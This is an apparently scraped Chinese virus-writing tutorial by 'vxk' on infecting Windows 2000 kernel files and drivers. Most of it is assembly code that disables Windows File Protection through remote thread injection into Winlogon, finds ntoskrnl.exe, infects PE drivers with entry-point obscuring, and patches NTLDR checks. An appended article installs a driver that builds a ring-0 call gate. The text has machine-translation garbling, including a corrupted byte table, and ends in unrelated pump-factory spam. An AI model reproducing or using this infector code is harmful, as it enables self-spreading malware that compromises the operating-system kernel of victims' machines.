| >Kernel Model Virus Class One::传染Ntoskrnl.exe和驱动的方法>>by vxk>>Kernel Model Virus Class>>叙言>>众所周知,驱动和Ntoskrnl.exe是Windows2k(本文以Win2k为类)的重要组成。>>因为只要病毒跟内核(驱动层)扯上瓜葛,马上就能引起轰动(CIH,CheXp,YM),所>>以为了避免很多麻烦本文过了1年才与各位观众见面(等了2年>>才出现在人类面前)。>>Kernel Model Virus Class One::>>本文介绍的病毒是一个Ring3+ring0的EXE情势的病毒,如果是Sys情势的病毒的话>>A部分可以略去......(SYS情势不做讨论,但可以从参考文献中获得一些信息)>>A.干掉WFP的方法>>不论要传染什么,只要和Win2k的重要部分有关,WFP这个麻烦就会出现.....>>所以要XXXXXXX,就必然要干掉WFP!!!!!!!>>干掉WFP的方法我感觉Benny的方法不错....>>详细代码::>>SFCPatch Proc Vxk:Ptr RoteProcpara>>pushad>>Call GetUU>>GetUU:>>pop ebp>>lea ebp,[ebp-offset GetUU]>>call set_new_eh>>pushad>>mov ebx,dword ptr [esp+cPushad+EH_ExceptionRecord]>>cmp dword ptr [ebx.ER_ExceptionCode],EXCEPTION_ACCESS_VIOLATION>>jne exception_handler>>call @n>>dd ?>>@n: mov ebx,[ebx.ER_ExceptionInformation+4]>>push PAGE_READWRITE>>and ebx,0FFFFF000h>>push 2*4096>>push ebx>>Call dword ptr [VXK]._VirtualProtect>>jmp SFCMainPatch>>exception_handler:>>popad>>xor eax,eax>>ret>>set_new_eh: ;set SEH frame>>xor edx,edx>>push dword ptr fs:[edx]>>mov fs:[edx],esp>>SFCMainPatch:>>@pushsz ‘sfc.dll‘>>call Dword ptr [VXK]._GetMoudleHandleA ;get sfc.dll address>>test eax,eax>>je end_rseh>>xchg eax,esi>>mov eax,[esi.MZ_lfanew]>>add eax,esi>>movzx edx,word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader]>>lea edx,[edx+eax+(3*IMAGE_SIZEOF_FILE_HEADER)]>>mov ecx,[edx.SH_SizeOfRawData] ;get size of section>>call @s_str>>@b_str: db 0FFh,15h,8Ch,12h,93h,76h ;code to search & patch>>db 85h,0C0h>>db 0Fh,8Ch,0F1h,00h,00h,00h>>db 0Fh,84h,0EBh,00h,00h,00h>>db 三次元h,02h,01h,00h,00h>>@s_str: pop edi>>s_str: pushad>>push @s_str-@b_str>>pop ecx>>rep cmpsb ;search for code>>popad>>je got_addr>>inc esi>>loop s_str>>jmp end_rseh>>got_addr:>>call e_next>>s_next: push 0 ;"patch" code>>call Dword ptr [VXK]._ExitThread>>e_next: pop edi>>xchg esi,edi>>add edi,6>>mov ecx,e_next-s_next>>rep movsb ;patch sfc.dll code by our code>>end_rseh:>>@SEH_RoveFrame>>popad>>ret ;and quit>>SFCPatch_End:>>SFCPatch Endp>>;in eax=hprocess;esi,edi>>RT_THeard Proc>>hProcessA DD ?>>mov dword ptr [ebp+hProcessA],eax>>push PAGE_READWRITE>>push M_RESERVE or M_COMMIT>>push edi>>push 0>>push eax>>call dword ptr [ebp+_VirtualAllocEx] ;aloc there a mory>>test eax,eax>>je err_rcr>>xchg eax,ebx>>mov [ebp+virus_base],ebx>>push 0>>push edi>>push esi>>push ebx>>push dword ptr [ebp+hProcessA]>>call dword ptr [ebp+_WriteProcessMory] ;write there our code>>dec eax>>jne free_m>>lea ecx,[ebp+tmp]>>;pRotePara =(RotePara *)VirtualAllocEx (hRoteProcess ,0,sizeof(RotePara),M_COMMIT,PAGE_READWRITE);>>;if(!pRotePara)return 0;>>;if(!WriteProcessMory (hRoteProcess ,pRotePara,&myRotePara,sizeof myRotePara,0))return 0;>>push PAGE_READWRITE>>push M_RESERVE or M_COMMIT>>push size [ebp+VX]>>push 0>>push dword ptr [ebp+hProcessA]>>call dword ptr [ebp+_VirtualAllocEx]>>push 0>>push size [ebp+VX]>>push [ebp+VX]>>push eax>>push dword ptr [ebp+hProcessA]>>call dword ptr [ebp+_WriteProcessMory]>>push edx>>push edx>>push edx>>push ebx>>push edx>>push edx>>push dword ptr [ebp+hProcessA]>>call dword ptr [ebp+_CreateRoteThread] ;run rote thread!>>push eax>>call dword ptr [ebp+_CloseHandle]>>err_rcr:jmp end_Sub>>free_m:>>push M_RELEASE>>push 0>>push ebx>>push dword ptr [ebp+hProcessA]>>call dword ptr [ebp+_VirtualFreeEx] ;free mory>>jmp end_Sub>>end_Sub:>>pushad>>popad>>retn>>RT_THeard Endp>>ScanOurEnmy Proc>>hprocessF dd ?>>push eax>>push 0>>push 43Ah>>Call dword ptr [ebp+_OpenProcess]>>mov dword ptr [ebp+hprocessF],eax>>ppname db MAX_PATH dup (?)>>push MAX_PATH>>push dword ptr [ebp+ppname]>>push 0>>push dword ptr [ebp+hprocessF]>>Call dword ptr [ebp+_GetModuleFileNameExA]>>mov edi,dword ptr [ebp+ppname]>>mov ebx,edi>>verif "Winlogo.exe">>;verif macro verifname,pty>>; local name>>; ifnb>>; %out too much arguments in macro ‘nxt_instr‘>>; .err>>; endif>>; call name>>; db verifname,0>>; name:>>; push ebx>>; CALL dword ptr [ebp+_lstrstr]>>; test eax,eax>>;endm>>jnz Install_SFCPatch>>jmp end_ap1>>Install_SFCPatch:>>lea esi,[ebp+SFCPatch]>>mov edi,SFCPatch_End-SFCPatch>>mov eax,dword ptr [ebp+hprocessF]>>Call RT_THeard>>Call NT_BootPatch>>end_ap1:call dword ptr [ebp+_CloseHandle]>>end_ap:>>retn>>ScanOurEnmy EndP>>WFP2k proc>>WFP:>>pushad>>call getwfpdelta>>getwfpdelta:>>pop ebp>>lea ebp,[ebp-offset getwfpdelta]>>mainloop:>>call getwfpapiz ;获得我们要的Apis,详细代码和有关定义省略了...>>call dword ptr [ebp+_GetCurrentProcess]>>lea ecx,[ebp+p_token]>>push ecx>>push 20h>>push eax>>call dword ptr [ebp+_OpenProcessToken]>>dec eax>>jne err_ap>>lea ecx,[ebp+p_luid]>>push ecx>>@pushsz ‘SeDebugPrivilege‘>>push eax call dword ptr [ebp+_LookupPrivilegeValueA]>>dec eax>>jne err_ap>>lea ecx,[ebp+token_priv]>>push eax>>push eax>>push 10h>>push ecx>>push eax>>push dword ptr [ebp+p_token]>>Call dword ptr [ebp+_AdjustTokenPrivileges]>>pushad>>lea esi,[ebp + procz]>>lea eax,[ebp + tmp]>>push eax>>push 80h>>push esi>>Call dword ptr [ebp+_EnumProcesses]>>dec eax>>jne Fuck_Stop>>add esi,4>>jmp p_search>>p_search:>>lodsd>>test eax,eax>>je Fuck_Stop>>call ScanOurEnmy>>jmp p_search>>Fuck_Stop:>>popad>>retn>>WFP2k Endp>>data_table=$>>RoteProcpara STRUCT>>_GetCurrentProcessID dd ?>>_DebugActiveProcess dd ?>>_WaitForDebugEvent dd ?>>_GetThreadContext dd ?>>_WriteProcessMory dd ?>>_SetThreadContext dd ?>>_ContinueDebugEvent dd ?>>_GetProcAddress dd ?>>_GetModuleHandleA dd ?>>_LoadLibraryAA dd ?>>_VirtualProtect dd ?>>_ExitThread dd ?>>RoteProcpara ends>>token_priv dd 1>>p_luid dq ?>>dd 2>>procz dd MAX_PATH dup (?)>>dd ?>>modz dd ?>>mod_name db MAX_PATH dup (?)>>p_token dd ?>>tmp dd ?>>VX RoteProcpara>>MyName Max_path dup(0)>>Data_table_end=$>>B.获得Ntoskrnl.exe的内存地址>>如果传染了驱动或者Ntoskrnl.exe,那么就必须获得Ntoskrnl.exe的内存位置才能获得kapiz来使用,这搭给出两种方法::>>一种是Sys情势的专用的动态的,一种是EXE情势的——传染时的静态定位(Win2k中Ntoskrnl.exe的地址在同一台机器上每次不异...)>>Sys情势::>>MmIsAddressValid proc lAddress:dword>>;用于判断一个地址是否存在....>>pushad>>mov ecx,lAddress>>mov eax, ecx>>shr eax, 14h>>mov edx, 0FFCh>>and eax, edx ;offset in PageDirectoryEntry>>sub eax, 3FD00000h;add eax,0c0300000h>>mov eax, [eax]>>test al, 1>>jz AddressInValid>>test al, al>>js AddressValid>>shr ecx, 0Ah>>and ecx, 3FFFFCh;offset in PageTableEntry>>sub ecx, 40000000h;add ecx,0c0000000h>>mov eax, [ecx]>>test al, 1>>jz AddressInValid>>test al, al>>js @f>>AddressValid:>>popad>>mov eax,1>>ret 04h>>AddressInValid:>>popad>>xor eax,eax>>ret 04h>>@@:>>and ecx, edx>>mov eax, [ecx-3FD00000h]>>and ax, 81h>>cmp al, 81h>>jnz AddressValid>>jmp AddressInValid>>MmIsAddressValid endp>>GetKernelBase proc uses esi edi dwKernelRet:DWORD>>LOCAL dwReturn: DWORD>>mov dwReturn,1>>mov edi, dwKernelRet ; edi = 堆栈顶>>repp:>>push edi>>call MmIsAddressValid>>cmp eax,1>>jnz adda>>cmp word ptr [edi],IMAGE_DOS_SIGNATURE ; 等于“MZ”吗?>>jz getp>>getp:>>mov esi, edi ; Yes, next...>>add esi, [esi + IMAGE_DOS_HEADER.e_lfanew] ; 就是 esi + 3ch>>push esi>>call MmIsAddressValid>>cmp eax,1>>jnz adda>>cmp word ptr [esi],IMAGE_NT_SIGNATURE ; 等于“PE”吗?>>jz find>>find:>>mov dwReturn, edi ; Yes, we got it.>>jmp endpp>>adda:>>add edi,001000h>>cmp edi,80501000h ; 基地址非3G模式一般不可能大于80500000h>>jz end>>jmp repp>>endpp:>>mov eax, dwReturn>>add esp,4*1>>ret 4>>GetKernelBase endp>>;Use::用法>>;Ring0Vstart:>>;pushad>>;push 80400000h>>;Call GetKernelBase>>;cmp eax,1>>;jnz my_virusbegin;去做我们的事情>>;jmp ret_file ;归回被传染的文件..>>EXE情势::>>SystModuleInformation equ 11>>PVOID TYPEDEF DWORD>>UNLONG TYPEDEF DWORD>>CHAR TYPEDEF BYTE>>STATUS_SUCCESS =0>>SYST_MODULE_INformATION STRUCT>>Reserved ULONG 2 DUP(?)>>Base PVOID ?>>SysModSize ULONG ?>>Flags ULONG ?>>Index USHORT ?>>Unknown USHORT ?>>LoadCount USHORT ?>>ModuleNameOffset USHORT ?>>ImageName CHAR 256 DUP(?)>>SYST_MODULE_INformATION ENDS>>.data>>_ZwQuerySystInformation dd ?>>ntoskrnl ULONG ?>>_VirtualAlloc dd ?>>_VirtualFree dd ?>>ntos db "ntoskrnl.exe",0>>.code>>FindNtoskrnl proc uses ebx esi edi>>local n:UNLONG>>local q:dword>>findit:>>pushad>>call getmeedp>>getmeebp:>>pop ebp>>lea ebp,[ebp-offset getmeebp]>>call getuseapiz;获得要用的Apiz...>>realfindproc:>>xor eax,eax>>mov n,eax>>mov q,eax>>lea esi,n>>push esi>>push 0>>push esi>>push 11>>call dword ptr[ebp+_ZwQuerySystInformation]>>call [ebp+_VirtualAlloc],NULL,n,M_COMMIT,PAGE_READWRITE>>or eax,eax>>jz Exit>>mov q,eax>>mov esi,eax>>push 0>>push n>>push esi>>push 11>>call dword ptr[ebp+_ZwQuerySystInformation]>>cmp eax,STATUS_SUCCESS>>jnz Exit>>mov edx,esi>>add edx,4>>mov ecx,dword ptr[esi]>>xor ebx,ebx>>sub edx,sizeof SYST_MODULE_INformATION>>@@:>>add edx,sizeof SYST_MODULE_INformATION>>cmp ebx,ecx>>inc ebx>>ja Exit>>assume edx:ptr SYST_MODULE_INformATION>>lea edi,[edx].ImageName>>movzx eax,[edx].ModuleNameOffset>>add edi,eax>>mov eax,dword ptr[ebp+ntos]>>cld>>scasd>>jnz @b>>mov eax,dword ptr[ebp+ntos+4]>>scasd>>jnz @b>>mov eax,[edx].Base;>>assume edx:nothing>>push eax>>call [ebp+_VirtualFree],q,n,M_RELEASE>>;free(q);>>pop eax>>ret>>;return ntoskrnl;>>Exit:>>mov edx,q>>test edx,edx>>jz @f>>call [ebp+_VirtualFree],q,n,M_RELEASE>>@@:>>xor eax,eax>>mov eax,1>>ret>>FindNtoskrnl endp>>;USE::>>;用法>>;Call FindNtoskrnl>>;cmp eax,1>>;jnz findok;找到了开始工作>>;jmp no_as;败绩,放弃这次传染...>>C.EXE情势的Ring3层传染的代码>>在C部分结束然后,我们已经获得了Ntoskrnl的内存地址并去处了该死的WFP,现在我们开始传染驱动文件吧,>>为了方便传染Ntoskrnl和驱动使用不异的插进去代码,我们采用EPO的方式......>>假设病毒用于rING0的代码开始为KRNLStart,病毒开始代码为Vstart,结束出为VEND,则病毒传染实现的代码为::>>;本代码基于PKXP的EPO程序,我的那个烂的EPO不舒服合用于教学...>>;这个代码可以传染Ring3/ring0程序!!>>;Entry::>>; EBP=Delta>>; [ebp+FileName]=The Name of the file which u want to infect>>;>>InfectFile:>>pushad>>push NULL>>push FILE_ATTRIBUTE_NORMAL>>push OPEN_EXISTING>>push NULL>>push FILE_SHARE_READ+FILE_SHARE_WRITE>>push GENERIC_READ+GENERIC_WRITE>>push [ebp+FileName]>>call dword ptr [ebp+_CreateFileA]>>cmp eax,INVALID_HANDLE_value>>jz IF_Exit>>mov [ebp+hfile],eax>>xor edi , edi ;节约空间>>push edi>>push edi>>push edi>>push PAGE_READWRITE>>push edi>>push [ebp+hfile]>>call dword ptr [ebp+_CreateFilappingA]>>or eax,eax>>jz IF_F3>>mov [ebp+hMapping] , eax>>push edi ;edi=0>>push edi>>push edi>>push FILE_MAP_READ+FILE_MAP_WRITE>>push [ebp+hMapping]>>call dword ptr [ebp+_MapViewOfFile]>>or eax,eax>>jz IF_F2>>mov [ebp+pMapping],eax>>mov esi,eax>>assume esi:ptr IMAGE_DOS_HEADER>>cmp [esi].e_magic,IMAGE_DOS_SIGNATURE>>jnz IF_F1>>cmp [esi].e_lfarlc,040h>>jnz IF_F1>>add esi,[esi].e_lfanew>>assume esi:ptr IMAGE_NT_HEADERS>>cmp [esi].Signature,IMAGE_NT_SIGNATURE ;是PE文件吗?>>jnz IF_F1>>xor eax,eax>>cmp [esi].OptionalHeader.Subsyst,8>>jnz set_ring3_file>>jmp set_ring0_file>>set_ring3_file:>>cmp [esi].OptionalHeader.Subsyst,2>>jnz IF_F1>>mov eax,1>>mov [ebp+isnt],eax>>set_ring0_file:>>mov [ebp+isnt],eax>>MakeCheck:>>push esi>>lea ebx,[esi].OptionalHeader.CheckSum>>mov ecx,[ebx]>>jecxz no_checksum>>mov dword ptr [ebx],0 ;zero the checksum>>push [ebp+fsize]>>push [ebp+hfile]>>Call dword ptr [ebp+_GetFileSize]>>mov ecx,[ebp+fsize];the file size>>add ecx,offset VEND-offset Vstart;the file size after infect>>push ecx>>push [ebp+hfile]>>call CheckSumFile>>mov dword ptr [ebx],eax>>no_checksum:>>cmp word ptr [esi+1ah],INF_SIGNE ;检查传染标记>>jz IF_F1>>mov eax,[esi].OptionalHeader.AddressOfEntryPoint>>add eax,[esi].OptionalHeader.ImageBase>>movzx eax,[esi].FileHeader.NumberOfSections>>mov ecx,sizeof IMAGE_SECTION_HEADER>>mul ecx>>add eax,sizeof IMAGE_NT_HEADERS>>add eax,esi>>mov edi,eax>>add eax,sizeof IMAGE_SECTION_HEADER>>sub eax,[ebp+pMapping]>>cmp eax,[esi].OptionalHeader.SizeOfHeaders>>ja IF_F1>>;*****************************************>>;空间允许, ^0^,edi指向新节>>;*****************************************>>inc [esi].FileHeader.NumberOfSections>>assume edi:ptr IMAGE_SECTION_HEADER>>mov dword ptr[edi],‘suedomsa.‘ ;Name::Asmodeus-->某个语言的恶魔>>push offset VEnd - offset VStart>>pop [edi].Misc.VirtualSize ;VirtualSize>>push [esi].OptionalHeader.SizeOfImage>>pop [edi].VirtualAddress ;VirtualAddress>>mov eax,[edi].Misc.VirtualSize>>mov ecx,[esi].OptionalHeader.FileAlignment>>div ecx>>inc eax>>mul ecx>>mov [edi].SizeOfRawData,eax ;SizeOfRawData>>lea eax,[edi-28h+14h] ;prev PointerToRawData>>mov eax,[eax]>>lea ecx,[edi-28h+10h] ;prev SizeOfRawData>>add eax,[ecx]>>mov [edi].PointerToRawData,eax ;PointerToRawData>>mov [edi].Characteristics,0E0000020h ;可读可写可执行>>;***************************************************************>>;更新SizeOfImage,使新节可以不错加载并首先执行>>;***************************************************************>>mov eax,[edi].Misc.VirtualSize>>mov ecx,[esi].OptionalHeader.SectionAlignment>>div ecx>>inc eax>>mul ecx>>add eax,[esi].OptionalHeader.SizeOfImage>>mov [esi].OptionalHeader.SizeOfImage,eax>>mov word ptr [esi+1ah],INF_Sign ;写入传染标记>>mov [ebp+pNTHeader],esi ;esi -> IMAGE_NT_HEADER>>mov ebx,edi>>mov eax,[ebp+isnt]>>mov edi,[ebx].PointerToRawData>>cmp eax,1>>jnz Nt_krnl_set>>jmp common_set>>Nt_krnl_set:>>add [ebx].PointerToRawData,offset KRNLStart - offset Vstart>>Common_set:>>mov [ebp+pNewSection],ebx ; edi -> new Section>>xor ebx,ebx>>call SimpleEPO>>push FILE_BEGIN>>push 0>>push edi>>push [ebp+hfile]>>call dword ptr [ebp+_SetFilePointer]>>;****************************************************************>>;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐>>;****************************************************************>>push 0>>lea eax,[ebp+ByteWrite]>>push eax>>push [edi].SizeOfRawData>>push [ebp+VStart]>>push [ebp+hfile]>>call dword ptr [ebp+_WriteFile]>>IF_F1:>>push [ebp+pMapping]>>call dword ptr [ebp+_UnmapViewOfFile]>>IF_F2:>>push [ebp+hMapping]>>call dword ptr [ebp+_CloseHandle]>>IF_F3:>>push [ebp+hfile]>>call dword ptr [ebp+_CloseHandle]>>IF_Exit:>>popad>>ret>>;---------------------------------StartEPO------------------------------>>;入口参量: pNewSection : 新添加节(病毒节)的指针>>; pNTHeader : 文件IMAGE_NT_HEADER的指针>>; [ebp+pMapping] : 文件指针>>;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.>>;-------------------------------------------------------------------------->>SimpleEPO:>>pushad>>mov edx , [ebp+pNTHeader]>>add edx , sizeof IMAGE_NT_HEADERS>>assume edx : ptr IMAGE_SECTION_HEADER>>mov ecx , [edx].SizeOfRawData>>mov edi , [edx].PointerToRawData>>add edi , [ebp+pMapping] ;Now edi = .text 的在文件中的偏移>>@SearchE8:>>mov al , 0e8h>>repne scasb ;search for call xxxxxxxx>>mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.>>lodsd ;search call relative>>add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]>>lodsw>>cmp ax , 025ffh ;esi - > YYYYYYYY>>jnz @SearchE8>>inc ebx ;纪录是第几个Jmp/call>>cmp ebx,20h ;如果是第3二个,那么开始工作....避免传染Ntoskrnl时,系统初始化败绩...>>jnz @SearchE8>>PatchCALLandCopyJMP:>>mov eax , [edx].VirtualAddress ;.text VirtualAddress>>add eax , edi>>sub eax , [ebp+pMapping]>>sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX>>add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)>>mov edx , [ebp+pNewSection]>>mov edx , [edx].VirtualAddress>>xchg eax , edx>>sub eax , edx ;get new XXXXXXXX>>stosd>>mov edi , [ebp+Ret2ApiCall] ;write YYYYYYYY>>lodsd>>stosd>>popad>>ret>>CheckSumFile PROC USES esi ecx edx lpFile:DWORD, dwFileLen:DWORD>>push esi>>push ecx>>push edx>>xor edx, edx>>mov esi, lpFile>>mov ecx, dwFileLen>>shr ecx, 1>>@CSumLoop:>>movzx eax, word ptr [esi]>>add edx, eax>>mov eax, edx>>and edx, 0ffffh>>shr eax, 10h>>add edx, eax>>add esi, 2>>loop @CSumLoop>>mov eax, edx>>shr eax, 10h>>add ax, dx>>add eax, dwFileLen>>pop edx>>pop ecx>>pop esi>>ret 08h>>CheckSumFile ENDP>>C+.更改NTLDR>>OpenFile proc p_Filename:dword>>push NULL>>push FILE_ATTRIBUTE_NORMAL>>push OPEN_EXISTING>>push NULL>>push FILE_SHARE_READ or FILE_SHARE_WRITE>>push GENERIC_READ or GENERIC_WRITE>>push p_Filename>>call [ebp+_CreateFile]>>ret 04h>>OpenFile Endp>>MapFile proc filehandle:dword>>xor eax,eax>>push eax>>push eax>>push eax>>push PAGE_READWRITE>>push eax>>push filehandle>>call [ebp+_CreateFilapping]>>ret 04h>>MapFile Endp>>ViewMap Proc maphandle:dword>>xor eax,eax>>push eax>>push eax>>push eax>>push FILE_MAP_ALL_ACCESS>>push maphandle>>call [ebp+_MapViewOfFile]>>ret 04h>>ViewMap Endp>>Alloc proc imageSize:dword>>xor eax,eax>>push PAGE_EXECUTE_READWRITE>>push M_COMMIT>>push imageSize>>push eax>>call [ebp+_VirtualAlloc]>>ret 04h>>Alloc endp>>PatchFile PROC p_Filename : DWORD, p_PatchAddr : DWORD, p_PatchSize : DWORD>>LOCAL p_FileHandle : DWORD, \>>p_FileSize : DWORD, \>>p_MapHandle : DWORD>>push p_Filename>>call OpenFile>>cmp eax,-1>>jz short PA_Exit>>mov p_FileHandle,eax>>push 00>>push eax>>call [ebp+_GetFileSize]>>mov p_FileSize,eax>>push p_FileHandle>>call MapFile>>or eax,eax>>jz short PA_CloseFile>>mov p_MapHandle,eax>>push eax>>call ViewMap>>or eax,eax>>jz short PA_Closap>>mov edx,eax>>mov edi,eax>>mov esi,p_PatchAddr>>mov ecx,p_FileSize>>PA_00:>>push ecx>>push esi>>push edi>>mov ecx,p_PatchSize>>repz cmpsb>>pop edi>>pop esi>>pop ecx>>jz short PA_01>>inc edi>>loop PA_00>>jmp short PA_Unmap>>PA_01:>>mov ecx,p_PatchSize>>add esi,ecx>>repz movsb>>PA_Unmap:>>push edx>>call [ebp+_UnmapViewOfFile]>>PA_Closap:>>push p_MapHandle>>call [ebp+_CloseHandle]>>PA_CloseFile:>>push p_FileHandle>>call [ebp+_CloseHandle]>>PA_Exit:>>ret 3*4h>>PatchFile ENDP>>NTPatch_Table=$>>NTLDR db ‘NTLDR‘,0>>NT4_NTLDR db 3Bh,46,58,74,07 ; signature (file check)>>db 3Bh,46,58,0EBh,07 ; patch>>W2K_NTLDR db 3Bh,47,58,74,07>>db 3Bh,47,58,0EBh,07>>NTPatch_Table_len=$-NTPatch_Table>>;Example>>;lea eax,[ebp+NTLDR]>>;lea ebx,[ebp+NT4_NTLDR]>>;pushad>>;push 05h>>;push ebx>>;push eax>>;Call PatchFile>>;popad>>;lea ebx,[ebp+W2k_NTLDR]>>;push 05h>>;push ebx>>;push eax>>;call PatchFile>>;popad>>D.参考文献>>用汇编写个最小的WDM驱动程序进RING0>>by Mgf>>在WINDOWS 2000/XP/2003里步入RING0是很多人的梦想,但实现这个梦想并不容易,>>因为基于NT内核的 WINDOWS 2000/XP/2003对自己保护得非常好,这与WINDOWS 9X>>有很大不同,WINDOWS 9X的GDT,IDT,LDT等重要的系统表格是可以被RING3的代码>>轻易修改的,因此在WINDOWS 9X里任何程序都可以在GDT,IDT,LDT里构造自己的>>调用门/中断门/陷阱门而步入RING0。在WINDOWS 2000/XP/2003里似乎只有写驱动>>才能步入RING0了,当然还可以利用系统漏洞步入RING0,本人就发现了二个漏洞可>>步入RING0,但本文只讨论写驱动的方式。>>现在介绍用汇编语言写普通WINDOWS应用程序的书也不少,用汇编语言写WINDOWS>>程序的程序员也越来越多,但缺憾的是这些书介绍的程序都是运行在RING3上的,>>我等技术寻求者怎能受制于RING3而无所作为?为了写出令人惊叹的程序(比如病毒,>>反病毒,防火墙等等),就必须要步入RING0。但是有关用汇编语言写WDM驱动程序>>的书和例子寥寥,我找到的绝大部分数都是用C写的,而且编译也很麻烦,对于汇编>>语言这类最适合写系统程序的语言来说是很缺憾的。为此我特意用我所懂得的常识>>写出本文,意在抛砖引玉,共同进步。>>好了,先来看看下面的例子:>>.586p>>.model flat,stdcall>>option casap:none>>.code>>start:>>nop>>nop>>nop>>nop>>pushfd>>pushad>>push edx>>sgdt [esp-2]>>pop edx>>mov eax,edx>>mov ecx,3e0h>>.if dword ptr [edx+ecx+2]!=0ec0003e8h>>mov byte ptr [edx],0c3h>>mov word ptr [edx+ecx],ax>>shr eax,16>>mov word ptr [edx+ecx+6],ax>>mov dword ptr [edx+ecx+2],0ec0003e8h>>mov dword ptr [edx+ecx+8],0000ffffh>>mov dword ptr [edx+ecx+12],00cf9a00h>>.endif>>popad>>popfd>>xor eax,eax>>ret 8>>end start>>把以上的汇编代码保存到文件mywdm.asm,然后用MASM 6.14按照下面的方法编译:>>ml /c /coff /Cp mywdm.asm>>link /subsyst:windows /driver:wdm /release /out:mywdm.sys mywdm.obj>>就会在时下目录下生成一个mywdm.sys文件,这是一个没有导入导出和资源的纯代码>>驱动程序,非常短小精干。如果导入了ntoskrnl.exe和hal.dll里的函数,或者导出>>给别人调用的函数,它将是一个功能周全的WDM驱动。>>mywdm.sys的功能是在GDT中创建一个3级调用门和一个0级32位代码段描述符,3级调用>>门的选择子是3E3,0级32位代码段的选择子是3E8。>>好了,现在执行mywdm.sys,但驱动程序是不能直接执行的,所以要构造它的执行环境。>>先在注册表香港EY_LOCAL_MACHINE\SYST\CurrentControlSet\Services中建立一个mywdm>>子键,然后建立3个DWORD型的键值:>>ErrorControl=0>>Start=3 (如果Start=1,mywdm.sys会随电脑启动而自动装入)>>Type=1>>再把mywdm.sys复制到syst32\drivers目录里,然后重新启动(好象不重新启动也可以,>>对这个我不太清楚),运行net start mywdm,成果屏幕上显示:>>“发生系统错误 1058。>>无法启动服务,原因可能是已被禁用或与其相关联的设备没有启动。”>>如果你轻信微软的这句话的话,你就至此为止了!别被微软欺骗,因为我们的代码已经>>执行过了,3级调用门和0级32位代码段描述符已经被建立在GDT中,而错误提示是在我们>>的代码执行后弹出来的,此时无论是成功提示还是错误提示对我们来说都已太晚了。不信,>>你可以用SOFT ICE看一看GDT就懂得我所言不虚!如果Start=1,系统不会提示错误而运行>>mywdm.sys。>>好了,既然GDT中已经有了我们的调用门,那么象征着我们写的应用程序可以自由地在>>RING3和RING0之间切换,但如何使用这个调用门还是有讲求的,它的使用方法是:>>...>>call 3e3:00000000 ;机器码 9A 00 00 00 00 E3 03>>;此时已经步入RING0,CS=3E8,跟着要切换堆栈>>mov eax,esp>>mov esp,[esp+4]>>push eax>>;这搭插手你要在RING0里执行的代码>>;准备归回RING3>>pop esp>>push offset ring3>>retf>>ring3:>>;此时回到RING3>>...>>为什么要切换堆栈?为什么要建立我们自己的0级32位代码段?直接使用操作系统的0级32位>>代码段(选择子=8)不可以吗?在这搭我要说明一下:WINDOWS 2000/XP/2003对自己保护得>>非常好,就算普通应用程序能步入RING0,但还是在用户区(代码和数值的地址都小于80000000H),>>所以WINDOWS 2000/XP/2003会认为长短法步入RING0的,就有可能产生页故障,体现是调用子程序>>或访问内存时就会触发页故障,解决的方法是切换堆栈;不消操作系统的0级32位代码段(选择子>>为8),用我们建立的0级32位代码段(选择子=3E8)。>>本文例子生成的mywdm.sys大小是1536字节,如果你对PE文件很了解,可以手工给mywdm.sys减肥,>>但要注重的是减肥后要把不错的CHECKSUM值填入PE头的CHECKSUM字段中,否则操作系统是不会装入>>mywdm.sys执行的。我就把mywdm.sys减肥到只有368字节(只有DOS头,PE头+节表,60H字节的重定>>位表和代码,应该是世上最小的驱动程序了)。完全可以把这个只有368字节的驱动程序包含在>>自己的程序中,在需要是把它还原到SYST32\DRIVERS目录里。>>计算CHECKSUM的方法是:把PE文件的所有字用ADC相加,然后获得的成果再和文件大小ADC相加,>>这个成果就是CHECKSUM值。网上也可以找到计算CHECKSUM的工具。>>RING3试验程序如下:>>.386>>.model flat, stdcall>>option casap:none>>include \masm32\include\windows.inc>>include \masm32\include\kernel32.inc>>include \masm32\include\user32.inc>>includelib \masm32\lib\user32.lib>>includelib \masm32\lib\kernel32.lib>>.data>>szExceptionCaused db "Exception Caused - could not switch to ring 0",0>>szError db "Error",0>>MsgCaption db " Test",0>>MsgBoxText db "cr0=%8x",0>>tmp db 50 dup(90)>>Callgt dd 0>>dw 3e3h>>.code>>ExceptCallBack PROC>>invoke MessageBoxA, 0, addr szExceptionCaused,addr szError, 0>>invoke ExitProcess, -1>>ret>>ExceptCallBack ENDP>>start:>>push offset ExceptCallBack>>call SetUnhandledExceptionFilter>>call fword ptr [Callgt] ;use callgate to Ring0!>>Ring0:>>mov eax,esp ;save ring0 esp>>mov esp,[esp+4];->ring3 esp>>push eax>>mov eax,cr0>>pop esp ;restore ring0 esp>>push offset Ring3>>retf>>Ring3:>>invoke wsprintfA,addr tmp,addr MsgBoxText,eax>>invoke MessageBox, NULL,addr tmp, addr MsgCaption, MB_OK>>Exit:>>invoke ExitProcess,NULL>>end start>>嘿嘿,大家以后就能够方便的写2K/XP/2003下的RING0病毒了。>>不重新启动装载.sys的例子:>>.586p>>.model flat,stdcall>>option casap:none>>include windows.inc>>include kernel32.inc>>include user32.inc>>include gdi32.inc>>include advapi32.inc>>includelib kernel32.lib>>includelib user32.lib>>includelib gdi32.lib>>includelib advapi32.lib>>.data>>szServiceName db ‘mywdm25‘,0 ;只要这个名字不重复,驱动程序装载成功的希望就很大!>>szDisplayName db ‘mywdm25 Driver‘,0 ;只要这个名字不重复,驱动程序装载成功的希望就很大!>>szFileName db ‘c:\windows\syst32\drivers\mywdm.sys‘,0>>hSCManager dd 0>>hService dd 0>>.code>>start:>>nop>>nop>>nop>>nop>>invoke OpenSCManager,0,0,000f000fh>>mov hSCManager,eax>>;00010030H=SERVICE_START OR SERVICE_STOP OR DELETE的组合码,用SERVICE_ALL_ACCESS>>;好象不行>>invoke CreateService,eax,offset szServiceName,offset szDisplayName,00010030h,1,1,0,offset szFileName,0,0,0,0,0>>mov hService,eax>>invoke StartService,eax,0,0>>invoke DeleteService,hService>>invoke CloseServiceHandle,hService>>invoke CloseServiceHandle,hSCManager>>invoke ExitProcess,0>>end start>尊敬的用户您好:上海品牌不锈钢磁力驱动泵厂家,请找上海龙亚不锈钢磁力驱动泵厂,如需选型报价的客户请致电O2l-6l557O88 或 